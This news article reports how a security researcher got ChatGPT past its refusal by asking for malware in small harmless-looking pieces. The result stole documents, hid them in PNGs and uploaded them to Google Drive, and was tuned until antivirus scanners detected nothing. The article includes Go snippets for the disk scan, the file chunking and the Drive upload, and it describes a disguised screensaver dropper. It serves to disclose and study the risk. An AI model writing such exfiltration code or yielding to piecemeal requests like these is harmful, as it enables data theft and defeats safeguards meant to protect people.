Researcher Tricks ChatGPT Into Building Undetectable Steganography Malware
Using only ChatGPT prompts, a Forcepoint researcher convinced the AI to create malware for finding and exfiltrating specific documents, despite its directive to refuse malicious requests.
A security researcher has tricked ChatGPT into building sophisticated data-stealing malware that signature- and behavior-based detection tools won’t be able to spot, eluding the chatbot’s anti-malicious-use protections.
Without writing a single line of code, the researcher, who admits he has no experience developing malware, walked ChatGPT through a series of simple prompts. The result was a malware tool capable of silently searching a system for specific documents, breaking those documents up and hiding them inside image files, and shipping them out to Google Drive.
In the end, it took only about four hours from the initial ChatGPT prompt to a working piece of malware with zero detections on VirusTotal, says Aaron Mulgrew, solutions architect at Forcepoint and one of the authors of the malware.
Busting ChatGPT’s Guardrails
Mulgrew says the point of his exercise was to show how easily someone can get past the guardrails ChatGPT has in place and create malware that would normally require substantial technical skill.
“ChatGPT didn’t uncover a new, novel exploit,” Mulgrew says. “But it did work out, with the prompts I had sent to it, how to minimize the footprint to the current detection tools out there today. And that is significant.”
Interestingly (or worryingly), the AI-powered chatbot seemed to understand the purpose of obfuscation even though the prompts did not explicitly mention detection evasion, Mulgrew says.
This latest demonstration adds to the rapidly growing body of research in recent months that has highlighted security issues around OpenAI’s ChatGPT large language model (LLM). The concerns include everything from ChatGPT dramatically lowering the bar to malware writing and adversaries using it to create polymorphic malware to attackers using it as bait in phishing scams and employees cutting and pasting corporate data into it.
Some contrarians have questioned whether the worries are overhyped. And others, including Elon Musk, an early investor in OpenAI, and many industry luminaries, have even warned that future, more powerful AIs (like the next version of the platform that ChatGPT is based on) could quite literally take over the world and threaten human existence.
Prompting Malicious Code Into ChatGPT
Mulgrew’s research is likely to do little to calm those who see AI tools as posing a major security risk. In a Forcepoint blog post this week, Mulgrew provided a step-by-step description of how he coaxed ChatGPT into building a full-fledged malware tool starting with an initial request to generate code that would qualify as malware.
When ChatGPT’s content filter predictably denied that request, Mulgrew changed tack: instead, he asked the AI tool to generate small snippets of code that, when put together, would function as data-stealing malware.
His first successful prompt got ChatGPT to generate code that searches the local disk for PNG image files larger than 5MB. Using that code, he then asked ChatGPT for additional code to encode any discovered PNGs with steganography; ChatGPT responded with a call to a readily available steganography library on GitHub.
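Forcepoint has not published the generated code, but the first step Mulgrew describes, walking the local disk for PNG files over 5MB, is an ordinary file-system scan. A minimal sketch in Go illustrates the idea; the language, function names, and starting path here are assumptions for illustration, not the code ChatGPT produced:

```go
package main

import (
	"fmt"
	"io/fs"
	"path/filepath"
	"strings"
)

// findLargePNGs walks root and returns paths of .png files larger than 5MB.
func findLargePNGs(root string) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return nil // skip unreadable directories instead of aborting the walk
		}
		if d.IsDir() || !strings.EqualFold(filepath.Ext(path), ".png") {
			return nil
		}
		info, err := d.Info()
		if err == nil && info.Size() > 5*1024*1024 {
			hits = append(hits, path)
		}
		return nil
	})
	return hits, err
}

func main() {
	pngs, err := findLargePNGs(`C:\Users`) // hypothetical starting directory
	if err != nil {
		fmt.Println("walk error:", err)
	}
	for _, p := range pngs {
		fmt.Println(p)
	}
}
```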
Using a series of further prompts, Mulgrew then got ChatGPT to generate additional code to find Word and PDF documents on the local disk. He then worked out how to get ChatGPT to write code that breaks files larger than 1MB into smaller chunks and uses steganography to hide those chunks inside the PNGs.
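The splitting step amounts to reading each oversized document and cutting it into fixed-size pieces that can then be hidden in separate carrier images. A hedged Go sketch of that chunking logic follows; the 1MB size matches the article, but the function name and file name are illustrative assumptions:

```go
package main

import (
	"fmt"
	"os"
)

const chunkSize = 1 << 20 // 1MB, the split threshold described in the article

// splitFile reads path and returns its contents as a slice of <=1MB chunks,
// each of which could then be embedded into a separate carrier PNG.
func splitFile(path string) ([][]byte, error) {
	data, err := os.ReadFile(path)
	if err != nil {
		return nil, err
	}
	var chunks [][]byte
	for start := 0; start < len(data); start += chunkSize {
		end := start + chunkSize
		if end > len(data) {
			end = len(data)
		}
		chunks = append(chunks, data[start:end])
	}
	return chunks, nil
}

func main() {
	chunks, err := splitFile("report.docx") // hypothetical target document
	if err != nil {
		fmt.Println("read error:", err)
		return
	}
	fmt.Printf("%d chunk(s) to embed\n", len(chunks))
}
```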
The final piece was getting the chatbot to write code for uploading the data to an external Google Drive account. With that, Mulgrew had tricked the AI into creating complete data-stealing malware despite its training to refuse malicious requests.
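Mulgrew does not reproduce the exfiltration code, and the upload step itself is an ordinary API call: Google Drive exposes a documented HTTPS upload endpoint. A sketch assuming a pre-obtained OAuth access token shows the general shape; the token handling and file names are illustrative assumptions, not the researcher’s implementation:

```go
package main

import (
	"bytes"
	"fmt"
	"net/http"
	"os"
)

// uploadToDrive pushes raw bytes to Google Drive's simple-upload endpoint
// using a bearer token obtained out of band (the OAuth flow is omitted here).
func uploadToDrive(token string, payload []byte) error {
	const endpoint = "https://www.googleapis.com/upload/drive/v3/files?uploadType=media"
	req, err := http.NewRequest(http.MethodPost, endpoint, bytes.NewReader(payload))
	if err != nil {
		return err
	}
	req.Header.Set("Authorization", "Bearer "+token)
	req.Header.Set("Content-Type", "application/octet-stream")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return fmt.Errorf("upload failed: %s", resp.Status)
	}
	return nil
}

func main() {
	img, err := os.ReadFile("carrier.png") // a stego-encoded image, per the article's workflow
	if err != nil {
		fmt.Println(err)
		return
	}
	if err := uploadToDrive(os.Getenv("DRIVE_TOKEN"), img); err != nil {
		fmt.Println(err)
	}
}
```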
Zero Detections on VirusTotal
To test whether malware detection tools would flag the ChatGPT-generated code as malicious, Mulgrew uploaded it to VirusTotal. Five of 60 vendors marked the file as suspicious. After working out that the issue likely stemmed from how the code called the steganography library, Mulgrew asked the chatbot to tweak the code, after which only two vendor products flagged it as suspicious. After further tweaking, he ended up with code that no product on VirusTotal detected.
For initial infiltration, Forcepoint researchers asked ChatGPT to create an SCR, or screensaver, file and embed the executable inside it, disguised as an “ease of use” add-on for everyday business applications, Mulgrew says.
“ChatGPT happily generated step-by-step instructions on how I could do that and configure the SCR file to auto-launch the executable.” While the method is not unique, it was notable that ChatGPT generated the content without the Forcepoint researchers having to find ways to bypass its guardrails, he says.
Mulgrew says it’s almost certain that ChatGPT would generate different code for similar prompts, meaning a threat actor could relatively easily spin up new variants of such tools. Based on his experience, he says, a threat actor would need little more than basic knowledge of how to write malware to get past ChatGPT’s anti-malware restrictions.
“I don’t write malware or conduct penetration tests as part of my job and looking at this is only a hobby for me,” he says. “So, I’d definitely put myself more in the beginner/novice category than expert hacker.”